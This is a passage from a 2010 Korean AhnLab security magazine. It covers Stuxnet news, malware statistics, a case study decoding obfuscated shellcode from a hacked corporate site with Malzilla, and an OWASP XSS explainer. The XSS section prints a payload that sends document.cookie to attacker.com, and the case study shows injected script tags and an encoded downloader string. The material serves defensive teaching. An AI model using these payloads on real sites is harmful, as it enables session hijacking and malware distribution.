자적) 전쟁의 일부"라고 보도했습니다. 일부에서는 스턱스넷에 감염된 4만

5000여 대의 컴퓨터 중 60%가 이란에 집중돼 있다는 보도도 나오고 있습

니다. 그 때문에 이란의 나탄즈(Natanz) 우라늄 농축 시설과 부셰르 원자력

발전소 파괴를 노리고 특정국가가 제작했거나 배후에 있는 것이 아니냐는

추측이 나오고 있는 겁니다. 당연히 핵 개발과 실험에 반대하는 미국과 이

스라엘, 영국, 그리고 프랑스, 독일, 심지어 중국까지도 용의(?)선상에 올라

와 주로 언급되고 있는 국가입니다.

무엇보다 우리가 주목해야 할 점은 이 스턱스넷 웜의 등장과 감염 확산이

"웜이 '무기화'된 첫 사례이자, 사이버전쟁이 '파괴공격' 단계로 진입한 것을

알리는 신호탄"이라고 하는 해외 보안전문가들의 경고일 것입니다. 지능형

전력망(스마트그리드) 구축사업이 한창인 지금, 또 자동차 ·조선 등 각 산업

에서 IT와의 융합이 가속화되는 이때 '스턱스넷' 웜으로 인한 이란의 피해를

교훈삼고 대책을 마련하고 미리 점검해봐야 할 것입니다. 이번 사례는 몇

년 전, 사이버공격의 위험성에 경각심을 불러일으켰던 브루스윌리스 주연

의 영화인 '다이하드4.0'을 다시 생각나게 하네요.(관련기사-다이하드4.0의 '

파이어세일' 공포) 전문가 경고처럼 각종 사회 기간인프라를 단계적으로 파

괴하는 것을 보여준 이 영화의 시나리오가 이미 현실화된 시기가 된 것일

까요? 그나저나 우리나라 산업시설에는 혹시라도 이 '스턱스넷' 웜의 악영

향이 없는지 궁금하네요.

(덧붙임) 그러고보니 얼마전에 안철수연구소가 산업용 시스템 전용 보안

솔루션을 선보였군요. 예전에 하우리도 산업용PC 전용 백신을 발표한 적

이 있었던 것으로 기억합니다.

이란 핵시설 강타한 악성코드 '웜(worm)'

디지털데일리 이유지 기자

18

2010.09

안철수연구소가 발표한 2010년 8월 ASEC(AhnLab Security

E-response Center) Report에 의하면 8월의 악성코드 월별 감염

보고 건수는 12,531,319건으로 7월의 악성코드 월별 감염 보고건

수 12,357,777건에 비해 173,542건이 증가하였다.

2010년 8월의 감염보고 건수 비율은 그림 2에서 알 수 있듯이 트

로잔(TROJAN)류가 45.8%로 가장 많은 비율을 차지하고 있으며

스크립트(SCRIPT)가 13.3%, 웜(WORM)이 10.7%를 각각 차지하고

있다. 또한 8월의 신종 악성코드 유형별 분포는 그림 3이 보여주

는 바와 같이 트로잔이 66%로 1위를 차지하였으며 그 뒤를 이어

애드웨어(ADWARE)가 22%, 드롭퍼(DROPPER)가 8%를 각각 차지

하였다.

악성코드 발견 건수는 94,045건이고, 악성코드 유형은 880건이

며, 악성코드가 발견된 도메인은 782건, 악성코드 발견된 URL은

3,638건이다(표 1 참조). 2010년 8월은 2010년 7월보다 악성코드

발견 건수는 다소 감소하였으나, 악성코드 유형, 악성코드가 발견

된 도메인, 악성코드 발견된 URL은 증가하였다. 2010년 8월 악성

코드 발견 건수는 전달의 100,682건에 비해 93% 수준인 94,045

건이며 악성코드 유형은 전달의 740건에 비해 119% 수준인 880

건이다.

ASEC Report 8월호에서는 화제가 됐던 악성코드 이슈인 가짜 백

신 설치를 유도하는 메일 형태 기승, 정상 백신을 사칭하는 가

짜 백신, 스마트폰 악성코드의 본격적인 등장, 안드로이드 폰 배

경화면 어플리케이션에 삽입된 악성코드, 특정 기업의 전자 서명

을 도용한 악성코드, 어도비 플래시 플레이어 업데이트로 위장

한 악성코드 등에 관해 심도 있게 다루었다. 또한 BlackHat2010

과 DEFCON18에서 발표된 현금 자동 입출금기 취약점, DLL

Hijacking 취약점, 콘솔 게임기에서 동작하는 악성코드, Imm32.dll

를 패치하는 악성코드의 증가 등에 관해서도 자세히 다루고 있

다. 안철수연구소 홈페이지(http://www.ahnlab.com/kr/site/

securitycenter/asec/asecReportView.do?groupCode=VNI001)

를 방문하면 ASEC 리포트 전문을 확인할 수 있다.

2010년 8월 악성코드 관련 주요 통계STATISTICS

8월 악성코드 감염보고,지난 달에 비해 다소 증가악성코드 발견 건수는 소폭 감소, 악성코드 유형은 늘어

[그림 1] 악성코드 월별 감염보고 건수

[그림 2]

악성코드 유형별 감염보고 비율

[그림 3]

신종 악성코드 유형별 분포

구 분 건 수

악성코드 발견 건 수 94,045

악성코드 유형 880

악성코드가 발견된 도메인 782

악성코드 발견된 URL 3,638

[표 1] 웹 사이트 보안 요약

19

2010.09

안철수연구소에서는 액티브허니팟(ActiveHoneypot)을 구축하여 악

성 코드를 계속하여 수집 및 분석하고 사이트케어(SiteCare) 등의

웹 위/변조 방지서비스를 제공하고 있다. 이 글에서는 최근 발생

한 악성코드 유포 사례를 통해 악성코드가 어떻게 탐지 되고 간

단한 분석을 할 수 있는지 알아보겠다. 개인 사용자 입장과 기업

의 보안 담당자 입장에서 악성코드 유포에 대한 대비책도 함께

알아보자.

지난 8월 한 주를 마무리하는 금요일 늦은 오후, 안철수연구소에

서 개발한 액티브허니팟(ActiveHoneypot)은 국내의 한 업체(이후

A사로 표기)에서 악성코드를 유포하고 있음을 CERT(침해사고대

응센터) 관제센터로 알려왔다. 악성코드 유포에 사용되었던 사이

트의 관리자로부터 웹 사이트 변조에 대한 침해 사고 조사를 의

뢰받아 포렌식을 진행하게 되었다. 침해사고 조사 결과 공격자는

웹쉘(Webshell)의 업로드를 통해 시스템의 권한을 획득하였으며

웹 페이지 소스 코드에 링크 한 줄을 추가해 악성 코드를 유포하

도록 변조했다. 웹쉘이 업로드 되고 얼마 지나지 않는 시점에 액

티브허니팟에 의해 특정 업체에서 악성코드를 유포함을 알 수 있

었다.

먼저 액티브허니팟에 대한 특징을 살펴보도록 하자. 액티브허니

팟은 기존의 허니팟과 달리 악성코드 샘플 수집 방법이 능동적

인 것이 가장 큰 특징이다. 기존의 허니팟은 취약한 서버를 운영

하여 많은 악성 코드 유포자들이 허니팟 서버를 공격하여 악성코

드를 업로드하도록 하는 방식이다. 이에 비해, 액티브허니팟은 취

약한 서버가 여러 URL을 방문하여 해당 사이트에서 배포하는 악

성코드를 다운로드 및 실행하며 악성코드 배포에 사용되는 URL

을 저장하는 방식이다. 최근의 악성코드는 인터넷 익스플로러

(Internet Explorer), PDF 뷰어(PDF Viewer), 플래쉬(Flash) 등의 애

플리케이션에서 발생하는 취약점과 악성코드, 침해 사고 사이트

가 결합된 형식으로 유포되는 특징을 보이고 있다. 이러한 악성

코드 유포의 특징을 고려해 볼 때 많은 샘플을 확보하기 위해서

여러 URL을 방문하는 것이 보다 효과적이다. [그림 1]은 액티브허

니팟의 개념도로 보안 패치가 되지 않은 가상 머신들이 URL 크

롤링(Crawling)을 통해 악성코드 유포 사이트나 침해 사고 사이트

를 접속하여, 해당 URL에 있는 링크를 다운로드 받는다. 그 중 악

성 코드가 삽입되어 있는 경우, 이를 다운로드 받고 실행시키며,

해당 URL 정보를 DB에 저장한다.

기업 웹사이트 변조 악성코드, 분석 및 대응방안CASE STUDY

기업 웹사이트 변조 악성코드분석 및 대응방안매주 금요일 저녁, 기업의 보안 담당자가 퇴근하면 회사 웹사이트가 변조되는 사건이 발생하곤 한다. 공격자는 주말에 관리자가 대응하지 않는다는 것을

알고 웹 사이트를 변조하여 주말 내내 악성 코드 유포에 사용했다. 주말 동안 회사 보안 담당자를 괴롭히고 한 주의 상쾌한 출발을 방해하는 이 악성코드

를 어떻게 하면 바로 탐지하고 대응할 수 있을까.

ActiveHoneypot에 의한 악성코드 유포 행위 탐지

[그림 1] 안철수연구소의 액티브허니팟(ActiveHoneypot) 개념도

보안패치가 안된 가상머신

침해사고가 발생해서악성스크립트가 삽입된 경우

침해사고 사이트악성코드 유포 사이트

가상머신으로 악성코드가다운로드 & 실행됨

Honeypot Agent

Internet

URL DB

URL Crawling

20

이 악성코드 실행 과정에서 샘플 분류 시스템, 샘플 분석 시스템

(파일 분석 및 네트워크 분석)을 통해 탐지 URL의 위험도를 판단

하며, URL DB를 갱신하고, 이 정보들이 안철수연구소 V3의 시그

니처 생성에 이용된다.

위 표의 내용은 액티브허니팟이 CERT 관제센터로 A사에서 악

성코드를 유포하고 있음을 알려온 메일의 일부이다. 이 메일 중

ReferURL에서 URL 크롤링(crawling)에 의해 방문한 사이트를 확인

할 수 있으며, 해당 사이트에서 다운로드 받고 실행되어 생성되

는 다수의 파일 정보는 DropFile에서 확인이 가능하다. 이곳에 표

시되는 MD5 해쉬 값을 사용하여 여러 악성코드 데이터베이스에

쿼리가 가능하여 파일의 악성 여부에 대해서도 바로 확인이 가능

하다.

그럼 Malzilla라는 툴을 사용하여 간단하게 악성코드를 분석하는

방법에 대해 살펴보자. 이 과정을 통해 악성코드 유포지의 정보

를 파악할 수 있다면, 추가 감염을 막기 위한 기본 정보 획득이

가능할 것이다.

A사의 웹사이트에 삽입된 악성 코드를 살펴 보니 쉽게 파악하기

힘든 구조로 삽입 되어 있었다. 악성코드 제작자의 입장에서 악

성 코드의 생명 주기는 매우 중요한 문제이다. 그들이 배포한 악

성코드도 언젠가 분석가들에 의해 분석되고, 안티 바이러스 제품

또는 네트워크 기반 보안 장비에 의해 탐지될 것이라는 것을 안

다. 악성코드 제작자는 최대한 분석을 어렵게 하기 위해, 여러 가

지 기법을 사용할 수 있는 데 이번 사건에서는 넓은 의미에서의

사회 공학적 기법, 그리고 코드 난독화 기술들을 사용하였다. A사

는 매우 복잡한 메인 페이지를 가지고 있으며, 많은 협력업체 및

광고 페이지의 링크가 표시되고 있었다. 이 메인 페이지의 수 많

은 페이지 중 한 파일을 변조하여 사업적으로 관계가 있는 B사

의 그림 파일을 불러들이도록 변조한 것이다. 우선 최초 삽입 위

치는 A사의 http://a.a.a.a/menu_js/displayobject.js로 이 파일의 하

단에 B사의 그림파일 hxxp://b.b.b.b/gs3/pc_search_top.gif을 불러

들이도록 내용을 추가했다. 이 때, 분석가 입장에서는 A사와 B사

가 협력사 관계가 있기 때문에 자연스럽게 지나치게 된다. 게다

가 B사에 포함되어 있는 pc_search_top.gif 파일의 확장자가 GIF라

는 점은 분석가에 의해 발각되지 않도록 노력한 흔적이 보인다.

이 pc_search_top.gif 파일을 다운로드 하여 내용을 살펴보면 다음

과 같다.

정상적인 GIF 파일의 경우, 아래 그림과 같이 GIF89a라는 시그니

처를 가지고 있다. 하지만 이 파일은 악성코드를 유포하도록 조

작되어 있었다.

DetectionTime]2010/08/27 20:07:52[/DetectionTime][ReferURL]1 [root]http://aaa.xxxx.net/1-1 http://aaa.bbb.ccc/1-2 http://aaa.bbb.ccc/css/main_2009.css1-3 http://aaa.bbb.ccc/js/comm_2009.js1-4 http://aaa.bbb.ccc/register/js/ajax.js1-5 http://aaa.bbb.ccc/js/main/main_2010.js1-6 http://aaa.bbb.ccc/js/main/career_scroll2009.js1-7 http://aaa.bbb.ccc/js/xxxx/jigu.js1-8 http://aaa.bbb.ccc/js/xxxx/service.js1-9 http://bbb.xxxx.net/js/jquery.min.js1-10 http://xxx.xxx.xxx.xxx/ads/Log.js1-11 http://xxx.xxx.xxx.xxx/ads/Log.asp1-12 http://aaa.xxxx.net/bin/minixxxx.cgi1-13 http://ssss.bbb.com/stat.php?id=1647759&web_id=1647759[/ReferURL][VulCLSID]VulCLSID.log is not found.[/VulCLSID][DownloadURL]HostURL.log is not found.[/DownloadURL][DropFile]1 ajax.js 412EEF3427CDA98FCEE56C675485EA572 career_scroll2009.js 3C14EA9E61189A8D3499C2A2C5571BE43 comm_2009.js 82CD11D666B053BA949940B33B4BEB4B4 C__Documents_and_Settings_Ahnmaru78_Application_Data_c.exe 80A6B2E44ADFE4885FD293415E46A2095 C__Documents_and_Settings_Ahnmaru78_Local_Settings_Temporary_Internet_Files_Content.IE5_SHIZK9MR_nb[1].exe 80A6B2E44ADFE4885FD293415E46A2096 index.html 6DDA821E0EBB9C97A907BD510D1C7FD27 jigu.js 9CFEF661DBC7404E135797C36476AA9C8 jquery.min.js E038EEC4B2A9BEE10C88049A5FB15C859 Log.asp C44DC1ABAA60F41F1D61DBC32FFB806110 Log.js DE2BC7C4AD4D8B68B44A9CB8CDB20D0311 main_2009.css 735D38B0FC020F449E1793D7E2C305BA12 main_2010.js 72725030D247030C6062E5A95DF35BB313 minidaum.cgi 47F00BFF3C8C8E3A1880262E543E7CC014 service.js 28DF21B60A55A514622FDD0680E02F2215 stat.php@id=1647759 6434F95356B86678F5D7F8D3625BBECE[/DropFile]

Malzilla를 이용한 악성코드 분석 방법

<script src="aad.jpg"></script><script src="aac.jpg"></script><script src="aab.jpg"></script><script language="javascript" src="http:// /click.aspx?id=372246532&logo=12"></script>

21

공격자는 이 악성코드 삽입 시 두 업체의 사회적 관계를 이용하

여 악성코드가 아닌 것처럼 연결했다. 또 확장자를 GIF 파일로 작

성하여 그림 파일인 것처럼 위장하는 기법을 사용하였다. Malzilla

를 이용해 분석한 결과, pc_search_top.gif의 첫 줄에 삽입되어 있

는 aad.jpg은 다음과 같은 내용을 가지고 있다.

공격자는 위 코드가 어떤 행위를 수행하는 지 한눈에 알아볼 수

없도록 변수명, 그리고 변수의 값 등을 난독화하였다. 이런 경우,

깔끔하게 정리되어 있는 코드를 보는 것 보다는 분석에 약간의

시간이 더 걸리도록 할 수 있다. 일반적으로 네트워크 보안 장비

는 정규 표현식 또는 패턴 문자열을 기반으로 공격을 탐지한다.

이러한 악성코드가 전송되는 경우에는 위와 같이 난독화 된 형태

로 피해자의 PC에 전송이 된 후, 웹 브라우저에서 실행할 때 실

제 취약점을 공격하는 형태로 동작하게 되어 탐지가 매우 어렵

다. [그림 2]는 Malzilla 최초 실행 화면이다. 그림 하단에서 이 툴

은 특정 URL에 있는 파일을 다운로드 받을 수 있는 기능을 제공

한다. 대부분의 악성코드들은 웹 브라우저를 통해 접근하면 웹

브라우저 자체에 존재하는 취약점 때문에 공격자가 의도한 임의

의 쉘(Shell) 코드가 실행되게 된다. 이 경우 악성코드를 다운로드

받고 자동 실행이 되기 때문에, 분석 시에는 이런 'Malzilla'와 같은

툴을 사용하는 것을 추천한다.

[그림 2]의 하단에서 URL 부분에 다운로드 받고자 하는 악성코드

URL을 입력하고 Get을 누른다. 그럼 [그림 3]과 같이 상단에 해당

파일에 대한 내용을 확인할 수 있다.

이 화면에서 파일의 내용이 표시되는 부분은 메모장 등의 애플리

케이션과 마찬가지로 복사, 붙여 넣기 등의 기능을 지원한다. 이

중 파일의 내용 중 YTMTV라는 변수에 대해 디코딩하는 방법을

알아보겠다.

변수의 값을 살펴 보면 '%uxxxx' 형태로 반복되는 것을 알 수 있

으며, 이 값은 인코딩된 값으로 'Malzilla'에서 제공하는 여러 디코

딩 기능으로 풀어 볼 수 있다. 큰따옴표(" ") 안의 내용을 복사하

여 상단 탭 중 Misc Decoders로 이동한 후 붙여넣기를 한다. 이

Misc Decoders에서는 JS.encode, Base64 인코드 등 여러 형태의

인코딩에 대해서 디코딩 기능을 제공한다. 붙여넣기 한 후 [그림

4]와 같이 UCS2 To Hex 버튼을 선택한다.

디코딩하면 아래의 결과를 얻을 수 있다.

[그림 2] Malzilla 최초 실행 화면

다운로드 받은 파일의 내용

[그림 3] Malzilla의 URL 분석 화면

var YTMTV="%ud5db%uc9c9%u87cd%u9292%u8c8c%u938f%u8f8c%u938c%u8b8c%u938c%u848c%u928b%ud2d9%ud3ca%ud2d1%ud9dc%u92ce%ud8c9%uc9ce%u938d%uc5d8%uBDd8%uBD";

[그림 4] Malzilla의 Misc Decoders 화면

dbd5c9c9cd8792928c8c8f938c8f8c938c8b8c938c848b92d9d2cad3d1d2dcd9ce92c9d8cec98d93d8c5d8BDBD

22

해당 값을 이제, 상단 메뉴 중 Hex View에 'Paste as hex' 항목을

선택하여 붙여넣기를 한다.

아래 그림과 같이 정상적으로 Hex 값이 들어 갔지만, 문자열을

확인할 수 없는 경우가 존재한다. 이 경우 XOR 연산 되어 있는

경우로 Malzilla에서는 XOR 키를 찾고, XOR 연산까지 해주는 기능

을 제공한다.

이제 XOR 연산을 할 Key를 찾아야 하는 데 방법에 여러 가지가

있을 수 있겠지만, 여기서는 약간의 편법을 사용하겠다. 웹 브라

우저에 존재하는 취약점을 이용하여 악성코드를 실행시키는 경

우, HTTP를 이용하여 외부의 악성코드를 다운로드 받아 실행시

키게 된다. 이 점에 착안하여, 우측에 스트링을 검색하는 기능

을 이용하여 http를 검색한다.(Find 버튼 클릭) 검색이 완료되면

Finished라는 대화 상자와 함께 key 부분에 bd라는 값이 들어가

있음을 확인할 수 있다.

이제 하단의 Apply XOR 버튼을 클릭하여 XOR 연산을 진행한다.

XOR 연산 적용 결과 악성 코드를 다운로드 받는 위치를 확

인할 수 있다. 안철수연구소의 V3 제품군에서는 test0.exe 파

일을 Trojan/Win32.OnlineGameHack으로 탐지하고 있다. 최

근 웹을 통해서 유포되는 악성코드는 대부분 온라인게임핵

(OnlineGameHack), 오토런(Autorun)계열의 악성코드이다. 온라인

게임핵의 경우 계정 유출, 개인정보 유출 등에 사용되며, 오토런

계열은 사용자 PC를 이용하여 DDoS와 같은 공격을 수행할 때 사

용될 수 있다.

앞서 살펴본 실제 사례와 같이 최근 악성코드 유포는 애플리케이

션 취약점 및 웹 브라우저의 취약점에 의해 유포되는 것이 특징

이다. 이 경우, 개인 사용자가 의심스러운 사이트에 접속하는 것

이 가장 중요하겠지만, 최근의 사례를 살펴 보면 사람들이 신뢰

하는 기업이 침해 사고를 당해 악성코드를 유포하는 경우가 많

이 발생하고 있다. 그럼, 개인 사용자와 기업 보안 관리자 입장

에서 이 악성 코드 유포에 대한 대처 방법에 대해 알아보자. 먼

저, 개인 사용자의 경우 안철수연구소에서 개발한 사이트가드

(SiteGuard, http://www.siteguard.co.kr/)를 설치한 후, 안전하게 웹

서핑을 할 것을 추천한다. 사이트가드를 이용하면 방문하는 사

이트에서 자동으로 다운로드 및 실행되는 악성코드에 대한 피해

를 미연에 방지할 수 있다. 사이트가드를 설치하면 좌측 상단에

S 모양의 아이콘이 표시되며, 사용자가 방문하는 사이트의 위협

요소를 판단하여 개인 사용자에게 알려주거나 차단한다. 이 기능

으로 악성코드 감염 예방 효과뿐만 아니라, 인터넷 사기 예방, 개

인 정보 유출 예방, 신종 및 변종 악성코드에 대한 예방까지 제공

받을 수 있다. 기업의 보안 관리자 입장에서는 다방면으로 노력

이 필요하다. 우선, 주기적인 웹 및 네트워크 취약점 점검이 필요

하다. 자동화된 툴에 의한 점검이라도 해커가 공격할만한 취약점

을 미리 파악하여 제거함으로써 보안성 강화를 이룰 수 있다. 이

번 침해 사고의 경우도 파일 업로드 취약점에 의해 웹쉘 업로드

가 가능한 것이 원인이었다. 이러한 문제점은 웹 페이지 개발 및

업데이트 시에 충분한 테스트 및 취약점 점검이 필요함을 의미한

다. 또한, 인프라 망에 웹방화벽 및 IPS 등의 보안 장비를 투입하

고 모니터링하는 것도 매우 중요하다. 최근에는 이러한 네트워크

기반 보안 장비로 차단하기 힘든 웹쉘 업로드에 대한 방어도 지

난 호에서 소개한 쉘클린(ShellClean) 등으로 방어가 가능하다. 지

금까지 액티브허니팟을 이용한 악성코드 탐지부터 Malzilla를 사

용한 악성 코드 내용 분석 및 대처 방안에 대해 다루어 보았다.

개인 사용자의 보안에 대한 보안 인식이 가장 중요하며, 최신 패

치 적용 및 사이트가드 등의 보안 프로그램 설치를 강력히 추천

한다. 기업 보안 담당자도 주기적인 취약점 점검, 보안 장비 도입

및 대응 및 탐지 체계 구축이 무엇보다도 시급하다. 이러한 작은

노력 들로 악성코드에 의한 피해와 우려가 없는 사이버 세상을

만들어보자.

[그림 5] Malzilla의 Hex View 선택 화면

[그림 6] Malzilla의 Find XOR key 화면

개인 사용자 또는 기업 보안 관리자 입장에서의악성코드 유포 대처 방법

23

2010.09

XSS 공격은 OWASP 2010 Top 10에서는 인젝션에 이어 위험도 2

위를 차지했다. 웹 애플리케이션 해킹 공격 중 하나인 XSS 공격

은 웹 사이트를 변조하거나 악의적인 사이트로 유도하는 행위를

한다. 이를 통해 악성코드를 유포하거나 개인 정보를 갈취하는

등의 피해를 입히게 된다. 지금부터 XSS 공격 위험에 대해 자세

히 알아보자. [그림 1]은 XSS 공격에 대한 개략적인 모습을 보여

주고 있다. 주요 내용을 살펴보면 다음과 같다.

Threat Agents(공격자)

내/외부 사용자, 관리자를 포함한 시스템에 신뢰할 수 없는 데이

터를 보낼 수 있는 사람

Attack Vectors(공격경로)

공격자는 브라우저에서 인터프리터를 악용할 수 있는 텍스트 기

반의 공격 스크립트를 전송한다. 데이터베이스의 데이터와 같은

내부 소스를 포함한 거의 모든 데이터 소스가 공격 경로로 사용

될 수 있다.

Security Weakness(보안 취약점)

XSS는 가장 널리 알려진 웹 어플리케이션 보안 결함이다. XSS

결함은 어플리케이션이 적절하게 검증하거나 제한하지 않고 사용

자가 제공한 데이터를 브라우저가 전송한 페이지에 포함시킬 때

발생한다. XSS결함은 Stored, Rflected, 그리고 DOM 기반 XSS.

이렇게 3가지의 알려진 형태가 있다. 대부분의 XSS 결함은 테스

트나 코드 분석을 통해 아주 쉽게 탐지할 수 있다.

Technical Impacts(기술적 영향)

공격자는 사용자 세션 하이재킹, 웹 사이트 변조, 악성 콘텐츠 삽

입, 사용자 리다이렉트, 악성코드를 사용해 사용자 브라우저 하이

재킹 등을 위해 사용자 브라우저에 스크립트를 실행할 수 있다.

Business Impacts(비즈니스 영향)

영향받는 시스템과 시스템이 처리하는 모든 데이터의 비즈니스

가치를 고려한다. 또한 취약점의 공개적 노출이 비즈니스에 미치

는 영향도 고려해야 한다.

OWASP Top 10 2010 - 2부HOT ISSUE

크로스 사이트 스크립팅,공격 위험과 예방법

OWASP(Open Web Application Security Project)에서는 웹 애플리케이션 환경에서 가장 중요한 위험 10가지를 선정하여 발표하고 있다. 안철수연구소 ASEC

Report에서는 OWASP Top 10에 대해 집중 소개할 예정이다. 이를 통해 고객들이 웹 애플리케이션 보안의 취약점을 인지하고 예방할 수 있기를 기대한다.

지난 호 인젝션(Injection)에 이어 이번 호에는 XSS(Cross Site Scripting, 이하 XSS)에 대해 집중 소개한다.

[그림 1] XXS(크로스 사이트 스크립팅) 개괄

24

이 애플리케이션은 신뢰할 수 없는 데이터를 검증이나 제한 처리

없이 HTML 구성에 사용한다

공격자는 브라우저에서 이 'CC' 변수를 아래와 같이 수정한다:

사용자의 세션 ID는 공격자의 웹사이트로 전송되어, 공격자는 사

용자의 현재 세션을 하이재킹 할 수 있다. 공격자는 XSS를 사용

해 애플리케이션의 CSRF 방어를 무력화할 수도 있다는 점에 주

의 하도록 한다.

XSS를 대응책으로는 활성 브라우저 콘텐츠와 신뢰할 수 없는 데

이터를 항상 분리해야만 한다.

선호되는 방법으로는 신뢰할 수 없는 데이터가 포함될 수 있는

HTML(body, attribute, 자바스크립트, CSS, URL) 기반 데이터 전체

를 올바르게 제한하는 것이다. UI 프레임워크에서 제한 처리를 수

행하지 않는다면, 개발자들은 어플리케이션 내에서 제한 처리를

포함시켜야 한다. 적절한 정규화와 디코딩으로 긍정적 혹은 화이

트 리스트 입력 검증을 수행하는 것도 XSS로부터 보호하는데 도

움이 되지만, 입력에 특수문자가 필요한 어플리케이션이 많이 있

기 때문에 완벽한 방어책은 될 수 없다. 이 경우, 입력을 허용하

기 전에 가능한 인코딩된 모든 입력을 디코딩해 길이, 문자, 포

맷, 데이터 관련 업무 역할을 검증하도록 한다. 지금까지 OWASP

2010 TOP2인 크로스 사이트 스크립팅(XSS)에 대해 알아보았다.

추가적인 내용은 아래의 자료를 참고하기 바란다.

[참고 자료]

OWASP• OWASP XSS Prevention Cheat Sheet• OWASP Cross-Site Scripting Article• ESAPI Project Home Page • ESAPI Encoder API• ASVS: Output Encoding/Escaping Requirements (V6)• ASVS: Input Validation Requirements (V5)• Testing Guide: 1st 3 Chapters on Data Validation Testing• OWASP Code Review Guide: Chapter on XSS Review

• CWE Entry 79 on Cross-Site Scripting

XXS 공격 예

(String) page += "<input name='creditcard' type='TEXT‘value='" + request.getParameter("CC") + "'>";

'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'.

XSS 공격에 대한 대응책

25

2010.09

회사의 보안 상황을 이동 중에도 확인할 수 있는 '정보보안의 스

마트워크 시대'가 열렸다. 안철수연구소는 자사의 DDoS 방어 전

용 장비인 '트러스가드 DPX' 제품군을 스마트폰, 태블릿PC 등 주

요 모바일 기기에서 모니터링할 수 있는 기능을 구현했다고 밝혔

다. 이처럼 다양한 모바일 기기를 지원하는 것으로는 국내 보안

업계 첫 사례이다. 이에 따라 기업의 보안 관리자가 DDoS 공격

방어 상황을 모바일 기기로 실시간 체크할 수 있게 됐다. 즉, 장

소에 구애 받지 않고 빠르게 DDoS 공격에 대응할 수 있는 것이

다. DDoS 공격 특성상 신속한 조기 대응이 가장 중요한 만큼 피

해 확산을 막는 데 큰 효과가 있을 것으로 기대된다.

이 기능은 HTML5 기반의 모바일 웹 앱 형태로 지원하므로 아이

폰뿐 아니라 갤럭시S, 아이패드, 갤럭시탭, 아이덴티티탭 등 대부

분의 모바일 단말기를 지원한다는 것이 가장 큰 특징이다. 기존

앱 방식은 아이폰 또는 안드로이드 기반에서만 구동 가능한 별도

의 앱을 설치해야 하며, 앱을 설치하려면 앱스토어에서 직접 구

매해 설치해야 하는 번거로움이 있다. 이와 달리 안철수연구소

는 표준 최종 규격 제정을 진행 중인 HTML5 기반으로 관리 환

경을 제공한다. 따라서 HTML5를 지원하는 모든 단말기에서 웹

으로 '트러스가드 DPX'에 접속하면 즉시 모니터링할 수 있다. 또

한 UI[User Interface]가 기존 PC 기반과 매우 유사해 친숙하게 사

용할 수 있다. 안철수연구소 제품마케팅팀 정진교 팀장은 "모바일

업무 환경이 보편화함에 따라 기업의 보안 관리자는 장소에 구애

받지 않고 능동적이고 신속하게 대응하기를 원한다. 특히 DDoS

공격 방어 제품은 촌각을 다투는 사안이 빈발하므로 가장 먼저

DDoS 공격 방어에 대한 모바일 환경을 지원하게 됐다"고 밝혔다.

이번에 모바일 모니터링 기능을 구현한 '트러스가드 DPX'는 DDoS

방어를 위한 보안 기술과 안철수연구소의 악성코드 분석 인프라

가 결합된 DDoS 공격 방어 전용 장비이다. 트러스가드 DPX는

DDoS 공격을 효과적으로 사전 차단하고 오탐 없이 정교한 탐지

기능을 제공한다. 또한, 다양한 DDoS 공격을 신속하게 방어할 수

있다. 특히 소스(Source) IP의 트래픽 양을 기준으로 방어하는 기

존 제품이 다량의 트래픽을 유발하는 정상 IP까지 차단하는 문

제를 획기적으로 개선해 오탐이 극히 적다. 아울러 크기가 매우

작은 패킷의 DDoS 공격까지 처리할 수 있다. 또한, '트러스가드

DPX'는 특허 기술인 클라우드 컴퓨팅을 이용한 DDoS 공격 탐지/

차단 기술을 활용해 DDoS 공격에 입체적으로 대응하는 것이 장

점이다. 즉, 발생 중인 DDoS 공격을 차단할 수 있도록 PC에서 탐

지된 DDoS 공격 정보와 '트러스가드 DPX'의 DDoS 공격 탐지/차

단 기능이 연동된다. 이로써 PC에서 DDoS 공격을 유발하는 악성

코드를 제거하여 네트워크 게이트웨이뿐 아니라 PC에서도 DDoS

공격을 효과적으로 탐지/차단할 수 있다.

트러스가드 DPX, 모바일 모니터링 지원PRODUCT ISSUE

트러스가드 DPX,모바일 모니터링 지원

DDoS 방어 제품 스마트폰으로 관리

HTML5 기반의 모바일 웹 앱 도입

DDoS 공격 방어 전용 장비, 트러스가드 DPX

AhnLab_CERT

9월 15일 Adobe Reader, Acrobat 관련 0-day 취약점

코드가 공개되었습니다. PDF 파일 열람은 확실한 경로

에서 배포되는 파일만 신뢰하셔야 합니다. http://bit.ly/

d7PsGM

AhnLab_TFT

다른 악성 스팸 메일들이 "Evite invitation from <영문 이

름>"와 "Ad third try "제목으로 유포 중이며 ZIP으로 압축

된 첨부 파일들은 악성코드이니 주의하세요

AhnLab_TFT

MSN 친구 리스트로 전파되는 악성코드가 발견되었습니

다. 대화창(http://ow.ly/i/3QdN)의 링크 클릭시 다운로드

되는 "P18943431.JPG-www.facebook.exe"는 악성코드이

니 주의하세요.

AhnLab_TFT

해외에서 급속 확산된 "Here you have"와 "Just For you"

제목의 악성 스팸 메일은 개인 정보 수집이 목적입니다.

자세한 정보는 ASEC 블로그(http://ow.ly/2Caof) 참고 하

세요

AhnLab_CERT

해킹된 트위터 계정을 통해 전파되는 가짜 TweetDeck

update 악성코드 주의! 자세한 정보는 안철수연구소

ASEC대응팀 블로그에서 확인하실 수 있습니다. http://

core.ahnlab.com/219

AhnLab's

What’s happeningSeptember

26

AhnLab_CERT

MS는 9월 15일 Insecure library loading 취약점 관련

Advisory를 업데이트 했으며, FIX IT을 제공하고 있습니

다. http://bit.ly/bhqydB, http://bit.ly/bCDVi8

AhnLab_TFT

페이스북으로 의심스러운 메시지의 단축 URL이 전달

될 경우에는 외국산 애드웨어가 설치 될 수 있으니 주

의하세요. 관련 정보는 ASEC 블로그(http://ow.ly/2DcLu)

를 참고 하세요~

AhnLab_CERT

오픈소스 공개 쇼핑몰 구축 프로그램 Zen Cart에서 PHP

Injection 취약점 확인 및 최근 공격 패턴 유입 중. Zen

Cart 1.3.8 이하는 모두 취약하므로, 관리자의 주의 요망.

AhnLab_CERT

phpMyAdmin 관련 취약점(CVE-2010-3055, CVE-2010-

3056) 취약점 공격 패턴 유입이 급증하고 있습니다.

phpMyAdmin 운영자의 주의가 필요한 시점입니다.

AhnLab_CERT

Cisco IOS XR에서 발생되는 치명적인 버그를 CISCO에

서 패치했다는 소식이군요. 다만, 패치 적용시는 신중을

기해야 할 듯 싶습니다. http://bit.ly/akmGOJ

AhnLab_man

ARP스푸핑 관련, V3 고객 및 AOS 적용 은행의 경우 문

제가 없었지만 그렇지 못한 경우 뱅킹 접속에 문제가

